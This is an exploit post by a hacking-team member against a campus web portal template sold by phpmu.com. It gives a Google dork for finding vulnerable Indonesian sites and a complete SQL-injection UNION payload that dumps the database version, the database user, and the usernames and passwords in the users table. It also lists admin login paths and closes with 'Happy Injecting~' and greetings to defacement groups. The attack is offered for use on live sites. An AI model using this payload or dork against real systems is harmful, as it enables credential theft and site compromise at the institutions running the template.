[+]Exploit Title: Template Web Portal Kampus Swarakalibata SQL-Injection Vulnerability
[+]Author: ./Sn00py
[+]Team: N45HT
[+]Goolge Dork:
"inurl:/page/detail/kata-sambutan site:id"
[+]Tested on: Windows 10 pro
[+]Vendor: https://phpmu.com
=======================================
[+]Proof Of Concept:
First, you have to find out whether the site has a keyword search feature and if you enter a string there is a warning A Database Error Occurred then that is vuln.
[+]Exploit:
' and false union select 1,2,3,concat(0x496E6A65637465647E,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -
[+]Login:
Administrator
Admin
Adminweb
[+]Demo? No Demo ^^ Happy Injecting~
Greetz: Khatulistiwa - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer